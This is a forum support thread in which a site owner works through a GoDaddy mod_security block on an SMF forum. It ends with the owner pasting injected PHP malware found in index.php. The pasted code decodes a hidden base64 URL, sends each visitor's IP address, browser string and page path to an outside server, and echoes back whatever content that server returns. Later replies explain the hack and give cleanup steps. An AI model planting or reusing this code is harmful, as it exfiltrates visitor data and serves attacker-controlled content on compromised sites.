So I was in Vegas from July 17-22. I didn't have time to do any posting while there. Today I logged in and noticed there was no posts made since July 17! I didn't think anything of it. But then when I tried to post something, I got the following error message in my Firefox browser (and other browsers):
"The connection was reset
The connection to the server was reset while the page was loading."
I even tried my my phone on a wap version of the forum, but still nothing.
I never made any changes to the website or the forum.
In fact, I even tried to login from using another user name and that too failed. Basically anything that involves submitting a form (posting, logging in, searching etc.) you won't be able to.
I have my site hosted on GoDaddy and I noticed they no longer have the option to submit support ticket, so I have had to call them and I was on hold for half an hour and I just gave up and decided to call them later.
What can cause this? the forum is fully browsable (assyrianvoice-dot-net-slash-forum) but just can't post of course.
Please help!
Godaddy are quite famous, for this. Chances are, they've changed something, in the configuration.
Possibly, mod_sec.
Best to have a natter, with them, first. :)
Quote from: K@ on July 23, 2014, 11:19:54 AM
Godaddy are quite famous, for this. Chances are, they've changed something, in the configuration.
Possibly, mod_sec.
Best to have a natter, with them, first. :)
Thanks a lot for the reply! Any idea what the ideal setting for 'mod_sec' should be?
Mmm interesting and frustrating that this would coincidentally happen on the day I leave (and no user bothered to email and let me know the forum is down) - at least it didn't ruin my Vegas vacation :)
Since this is a hosted site on a shared server, I hope they won't mind changing the setting to make my forum workable again.
mod_security should be just turned off ;) they usually do it if you ask them kindly AFAIK :)
I am speaking to them right now and he can't figure out what the problem is. He is probably going to escalate it to his advanced team.
Actually, he thinks it is due to my DB being large size (about 975 MB) but I don't think that should be an issue. 975 MB is not a big deal compared to some other DBs I have seen that are 10x as big and also being hosted on shared hosting.
Godaddy are weird, with mod_sec. They're notorious for having it set quite harshly and they refuse to change it.
To show you how silly it is, it'll freak at the word "Essex", coz it contains the letters "SE, "E" and "X", in that order.
It should be banned, itself, methinks.
GoDaddy has opened an incident ticket to look into this, but I was looking at my error file and I found the following:
"Access denied with connection close (phase 2). 1 [file "/web/httpd2/modsecurity.d/activated_rules/modsecurity_gd_07_post_guardian.conf"] [line "36"] [id "10725"] [msg "BLOCKED - PHP Script hidden as a GIF - Pattern 1 - Location: file"] [hostname "www.sitename.net"] [uri "/forum/index.php"] [unique_id "U8-FCESy-gEAAAcyda0AAABF"]"
does this ring a bell or mean anything to anyone please?
try asking them to disable mod_security... good luck getting it done.
Yeah, that kinda confirms my thoughts. (Yay me!) ;)
Good luck, coz I have a feeling you're gonna need it, with Nodaddy.
Ehi you two! :)
Quote from: Flavio93Zena on July 23, 2014, 11:47:44 AM
mod_security should be just turned off ;)
I had said that already :P ninja'd :3
Quote from: K@ on July 24, 2014, 04:59:48 PM
Nodaddy.
I am 100% sure that that is not a typo XD
It was more polite than what I was thinking... :)
In case it helps that's an error I was seeing every five minutes when I was hosted with GoDaddy. Since I moved my site to CoreISP I haven't seen it once :)
Godaddy has responded and is telling me that there is malware in my website and that they can't help! I don't know if I believe that. I searched my site using multiple security sites but nothing is found.
Again, this is the error I am getting and I would really appreciate if anyone can help:
"ModSecurity: Access denied with connection close (phase 2). 1 [file "/web/httpd2/modsecurity.d/activated_rules/modsecurity_gd_07_post_guardian.conf"] [line "36"] [id "10725"] [msg "BLOCKED - PHP Script hidden as a GIF - Pattern 1 - Location: file"] [hostname "www.assyrianvoice.net"] [uri "/forum/index.php"] [unique_id "U9JVykSy-gEAAA410XcAAAAD"]"
I have responded to them already and asked them to look into this again. I am really frustrated, my 10+ years forum is now down for over a week, for the first time ever.
It would really help if they could be clear about what exactly has tripped that rule :(
The funny thing is, in my error log, I see that same error for another section on my website (it is a simple BB software, not SMF)
[Fri Jul 25 06:04:20 2014] [error] [client xx xxx xxx xxx] ModSecurity: Access denied with connection close (phase 2). 1 [file "/web/httpd2/modsecurity.d/activated_rules/modsecurity_gd_07_post_guardian.conf"] [line "25"] [id "10710"] [msg "BLOCKED - Known Template(cached)"] [hostname "www.xxxxxxxx.net"] [uri "/mb/mboard.php"] [unique_id "U9JV00Sy-gEAAC86SsIAAAB1"]
but when I go to that section mentioned above, I don't have a problem like with SMF and can use it fine.
At least we know it's mod_security at fault, which is something. I'd love to know what rule is being flouted since the description doesn't really make sense to me.
Ok, here is their email to me. They are actually faulting my home page (index.php) for the malware!
--------------------------------------------------------------
In regard to the inability to access and/or view the assyrianvoice.net website, upon additional review, our hosting administrators have determined a PHP script has been embedded as a GIF file on the home page of the website. As such, and due to the potential malicious nature of such coding, this is preventing access to the content. You may review the following information which regard to potential malware.
Malware is short for malicious software. It's a catch-all term that describes harmful applications or other malicious code such as adware, spyware, trojan horses, worms or viruses.
Malware comes in many forms, from an unwanted ad reappearing on your site to an executable file that infects visitors who click on it. Telltale signs that your site is infected can include unexplained ads, links or pop-ups, but some malware can have no noticeable effects at all.
Your best defenses against malware are staying current with third-party application patches and using strong server passwords. When checking for the presence of malware, be sure to check the code residing on your server and not your backup files. Always use a virtual machine for verification to avoid infecting your own computer.
We cannot assist you with removing malware from your server. Consider taking your site down immediately to prevent infecting visitors, and take action quickly to identify/remove it.
Identifying Malware
If you think you're having an issue with malware, change passwords that would be affected such as FTP or database passwords. Then use these guidelines to identify the problem.
............................................................
see problem is, I don't even know if they are talking about the same issue I am having! I told them I have a problem with my forum, and they write back saying I have malware in my home page which is preventing me from accessing the content. I am able to access all content with no problem. The only thing I can't do is post/login/search my SMF forums. Period!
I already replied to them to let them know that they may not be looking at the right problem here.
I already checked my home page and don't see anything wrong with it, but if someone is willing to take a look at it further, I will gladly post it here.
Thanks,
That's awfully vague. Specifics from the host would be appreciated.
I just called them to get an update/escalation on my ticket and the wait time was close to 20+ minutes. Been with them for over a decade and noticed their wait times have never been as long as they have been in the last few days.
Spoke to them again. They said it looks like a PHP file, likely disguised as a GIF file, was uploaded to my website. This file is acting as a malware and thus GoDaddy is blocking it from making a connection, every time takes an action that is triggering it.
They said they will try to look for this malicious code and they have no easy way of finding it, if ever.
If anyone knows where I can look for this code, it would be great. I already scanned my site but found nothing.
And I am not even sure where this malware is, whether it is on my forum directory or other places. Forum is the only section I can think of that can allow you to upload images.
IMHO they are fooling you... I've never heard about anything similar before...
Quote from: backend on July 25, 2014, 02:20:07 PMThey said they will try to look for this malicious code and they have no easy way of finding it, if ever.
That inspires confidence in them, doesn't it? ;)
If I'd been unfortunate enough to use Nodaddy, I think I'd look through my directories, setting the files in date order, to see if there's a file, there, which has a recent date on it, that looks a bit spurious.
I have a feeling that I wouldn't find anything, though.
Can you do a file compare (Laborious though that is)?
Quote from: Flavio93Zena on July 25, 2014, 02:29:33 PM
IMHO they are fooling you... I've never heard about anything similar before...
it has happened before... it was the cause of many hackings before the attachments and avatars got encrypted file names. any decent host would let you know the name of the file at least.
Quote from: Illori on July 25, 2014, 02:32:33 PM
Quote from: Flavio93Zena on July 25, 2014, 02:29:33 PM
IMHO they are fooling you... I've never heard about anything similar before...
it has happened before... it was the cause of many hackings before the attachments and avatars got encrypted file names. any decent host would let you know the name of the file at least.
Well thanks for letting me know :) and I agree actually, any decent host would have mentioned the name of the file, they should have it in their logs somewhere.
This is a duplicate of my issue and we are running at the same status... Funny same date and same responses
They final answer is that this is third party software and that it's not their problem.
MOD's should we merge the two threads...
Will follow to see if you get anywhere
So far it looking like an uninstall and reinstall, but I don't want to loose all of our history... ARGHHHHH
Quote from: iamarealbigdog on July 24, 2014, 09:13:25 AM
Canadian Southern BBQ Association
Very active forum for 2 yrs
http: //www.csbbqa.com/smf_forum/index.php
version 2.02
Host Go Daddy
Issue started July 17th, 2014 was intermittent for the day but by the end of the day effected all users
http://www.simplemachines.org/community/index.php?topic=525600.0 (http://www.simplemachines.org/community/index.php?topic=525600.0)
this is the other thread I am running on
For the love of gods, why do people assume that a clean set of files will lose their data?
Does no one actually read the FAQ/manual about how to load a fresh set of files?
Quote from: Kindred on July 25, 2014, 05:33:46 PM
For the love of gods, why do people assume that a clean set of files will lose their data?
Does no one actually read the FAQ/manual about how to load a fresh set of files?
Apparently not! :-)
Quote from: Kindred on July 25, 2014, 05:33:46 PM
For the love of gods, why do people assume that a clean set of files will lose their data?
Ask them :P
Quote from: Kindred on July 25, 2014, 05:33:46 PM
Does no one actually read the FAQ/manual about how to load a fresh set of files?
Probably they don't xD anyway you will probably be posting from the phone so I will provide you the link you are talking about --> http://wiki.simplemachines.org/smf/How_to_upload_a_fresh_set_of_files
Quote from: Kindred on July 25, 2014, 05:33:46 PM
For the love of gods, why do people assume that a clean set of files will lose their data?
Does no one actually read the FAQ/manual about how to load a fresh set of files?
with no disrespect intended, I have a full time job, a competition BBQ team to run, a national BBQ association and just spent 6 hours on the phone with Go Daddy for them to basically to tell me to piss off.
I am not a computer IT specialist and I maintain a forum for BBQ enthusiast. I can cook the world's best steak, Canada's best Whole Hog and an awesome chili being the undefeated National Chili Champion. I am doing research for our team's submission to the 2014 World food championship and putting three kids through University.
As of writing this message there is 3,510,977 Posts in 426,081 Topics by 338,009 Members on this forum.
Sorry I did not get to the one message you indicated,
Quote from: Flavio93Zena on July 25, 2014, 05:45:22 PM
Probably they don't xD anyway you will probably be posting from the phone so I will provide you the link you are talking about --> http://wiki.simplemachines.org/smf/How_to_upload_a_fresh_set_of_files
Thank you kindly this will save me countless hours of work
Mike
Quote from: iamarealbigdog on July 25, 2014, 06:39:11 PM
Quote from: Flavio93Zena on July 25, 2014, 05:45:22 PM
Probably they don't xD anyway you will probably be posting from the phone so I will provide you the link you are talking about --> http://wiki.simplemachines.org/smf/How_to_upload_a_fresh_set_of_files
Thank you kindly this will save me countless hours of work
Mike
No problem you're very welcome :D
do note, I did indeed indicate the FAQ, not all the messages in the forum (and as notes, I didn't link you directly because I was posting from a phone and it's difficult to paste links -- but hopefully, pointing someone to the FAQ will encourage them to read it. :)
I'll argue about the steak later... I cook a mean sirloin, rubbed with a cacao/chipotle dry rub... :D
UPDATE
We were able to reset our system and posting is back online... I hate Go Daddy, why do I give them so much money. I will spend the weekend backing up again and then upgrading to the 2.08 version...
Thanks all
(and as for the steak, we are the holders of three world championships titles for it, good luck)
Quote from: Kindred on July 25, 2014, 08:52:28 PMI cook a mean sirloin, rubbed with a cacao/chipotle dry rub... :D
[OT]When's the BBQ?[/OT]
Quote from: iamarealbigdog on July 25, 2014, 09:54:35 PM
UPDATE
We were able to reset our system and posting is back online... I hate Go Daddy, why do I give them so much money. I will spend the weekend backing up again and then upgrading to the 2.08 version...
Thanks all
(and as for the steak, we are the holders of three world championships titles for it, good luck)
Can you explain what you mean by 'resetting our system'?
Did you have to start from scratch or did GoDaddy resolve the issue?
I don't think it was a good idea to merge these two threads. One issue got resolved and the topic was marked solved while the other issue (mine) is not resolved yet, so it is a bit confusing.
It is almost 2 weeks now and the issue is still not resolved. Last time I called GoDaddy, they said they are still working on it.
I even went ahead and installed SiteMark and so far it hasn't found any issues, although the 'SQL Injection Scan' and 'Application' scans are still pending.
if it had been 2 weeks and i was waiting i would have already started to search for a new host...
Quote from: Illori on July 29, 2014, 09:58:22 AM
if it had been 2 weeks and i was waiting i would have already started to search for a new host...
you guys make it sound so easy to just search for a new host.
honestly, I have been with GoDaddy since about 2001 or so and hardly ever had a problem. I have so much hosted with them and moving away would be a nightmare. I mean it is doable but don't think it is warranted.
I just want to see what others have done to fix this issue so I can maybe replicate it.
pick a host from here http://www.simplemachines.org/community/index.php?board=155.0 and they will move all your sites files etc for you.
Ok so here is something strange.
I found a loophole that finally allows me to post to my forum : using the iPhone app 'Tapatalk' I was shocked to find out that I can post with no problem.
Meanwhile , I still can't post using a browser.
Of course, this is not the solution to my problem, but maybe it can help us find a solution. In other words, why am I able to post from an iPhone app and not from a browser? How can we use that to solve the problem at hand, if at all?
Quote from: backend on August 02, 2014, 01:11:33 AM
Ok so here is something strange.
I found a loophole that finally allows me to post to my forum : using the iPhone app 'Tapatalk' I was shocked to find out that I can post with no problem.
Meanwhile , I still can't post using a browser.
Of course, this is not the solution to my problem, but maybe it can help us find a solution. In other words, why am I able to post from an iPhone app and not from a browser? How can we use that to solve the problem at hand, if at all?
So, anyone got a clue on this please?
Ok, so after being patient for some +3 weeks, they have finally resolved the issue. But I am not really sure what the issue was and their email below is very vague. I did reply asking them to explain what the issue was and I am still waiting:
The issue with your Authorize.net transactions on your two secondary domains has been addressed and resolved. If this issue re-occurs, or you experience any other problems please let us know and we would be happy to assist you further. We appreciate your patience and understanding in this matter.
First of all, what a hell is Authorize.net? I have never used it on my website and have no idea what it is. Second of all, what do they mean 'two domain names'? Sure I have a few domain names hosted with them but what does that have to do with this issue?
It is as if they are talking about a completely different issue or client.
I hope to call them later this week to clarify what the issue was.
Damn it, I think I spoke too soon! After working for almost two days with no problem, it has stopped working again now, damn it! Same issue again....
Hope it is temporary...
Found this information that may be of usage to some:
http://developers.wpeasycart.com/2014/07/31/godaddy-shared-hosting-now-an-issue/
How's this going, now?
Quote from: K@ on August 14, 2014, 04:11:49 PM
How's this going, now?
Hi there, not sure if you read my last 3 posts or so, they fixed the problem, only for it to come back again about 48 hours later.
Now I am in touch with them again.
Will keep you guys updated.
Might be best to bite the bullet and give godaddy the flick...
It has now been a 40 days and still have this issue.
Spoke to GoDaddy on Sunday and the rep said it is now with their 4th level support.
40 days and you still haven't jumped ship?
GoDaddy is lucky to have such a loyal client, heh.
Considering they don't seem to be able to resolve the issue, I'd start considering my options.
Quote from: CoreISP on August 27, 2014, 09:46:47 PM
40 days and you still haven't jumped ship?
GoDaddy is lucky to have such a loyal client, heh.
Considering they don't seem to be able to resolve the issue, I'd start considering my options.
Couldn't have said it better myself. I was with GD for about a year in the very beginning and had nothing but issues when it came to SMF and WP. Moved eight years ago and have not had one issue since.
Guys I have been with Godaddy for almost 14 years (SMF since 2005) and have never had any real problems. This is the first one and unfortunately it has been my worst ever.
Quote from: backend on August 27, 2014, 11:35:10 PM
Guys I have been with Godaddy for almost 14 years (SMF since 2005) and have never had any real problems. This is the first one and unfortunately it has been my worst ever.
2014-2005=9, not 14 actually... Anyway I think you have been really lucky if you check the whole forum you will find lots of topics made by angry people experiencing troubles because of GoDaddy's servers...
One can be a user on GoDaddy's servers without SMF, you know ;)
As a website, been with GD for about 14 years.
As for SMF, I have had it with GD for about 9 years now.
And this makes me think I should go to bed, lol on that one :P
Anyway it doesn't change very much, you have been lucky ;)
Don't hold your breath... If you search for posts involving Godaddy, here, you'll see why... :(
Guys, finally some good news! :)
Got a reply back from GoDaddy telling me that some 23 pages on my website (not just SMF) were infected with some code. But they only gave me part of the code. I did some research and found the following code which others have complained about as well:
Quote<?php
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
// This code use for global bot statistic
$sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot
$stCurlHandle = NULL;
$stCurlLink = "";
if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
{
if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create bot analitics
$stCurlLink = base64_decode( 'aHR0cDovL2JvdHN0YXRpc3RpY3VwZGF0ZS5jb20vc3RhdC9zdGF0LnBocA==').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
@$stCurlHandle = curl_init( $stCurlLink );
}
}
if ( $stCurlHandle !== NULL )
{
curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 12);
$sResult = @curl_exec($stCurlHandle);
if ($sResult[0]=="O")
{$sResult[0]=" ";
echo $sResult; // Statistic code end
}
curl_close($stCurlHandle);
}
}
?>
I looked at my index.php and found it at the very bottom of the page.
When I deleted that part, the forums were back up and running like magic! I couldn't believe it, what a relief!!!!!!!!!!!
Now I just have to remove it from the other pages.
Now here is my question: how can I make sure this doesn't happen again? is this happening through an SMF mod/theme or even WordPress Plugin? Where do you even start?
I have already changed my forum/cPanel/FTP passwords. What else can I do?
I will keep an eye on this for the next few days to see if the code will somehow come back and let you guys know. If not, I will mark this topic solved.
ooh... that is sneaky...
http://www.peterrosenmai.com/a-hacking-visible-only-to-google
decode the base64 - it points to botstatistic...
So - looks like you were hacked.
1- start checking *ALL* files and directories. Hackers rarely drop a single payload.
2- figure out WHEN it happened. Look at the timestamp on the modified files (before you removed the code yourself) - then ask your host to help get the server logs for that time period.
3- report with the server logs to the security form
http://www.simplemachines.org/about/smf/security.php
and you can send the server logs to
[email protected]when you file the report, indicate the smf version, mods installed and whether you have any other software installed on the same server.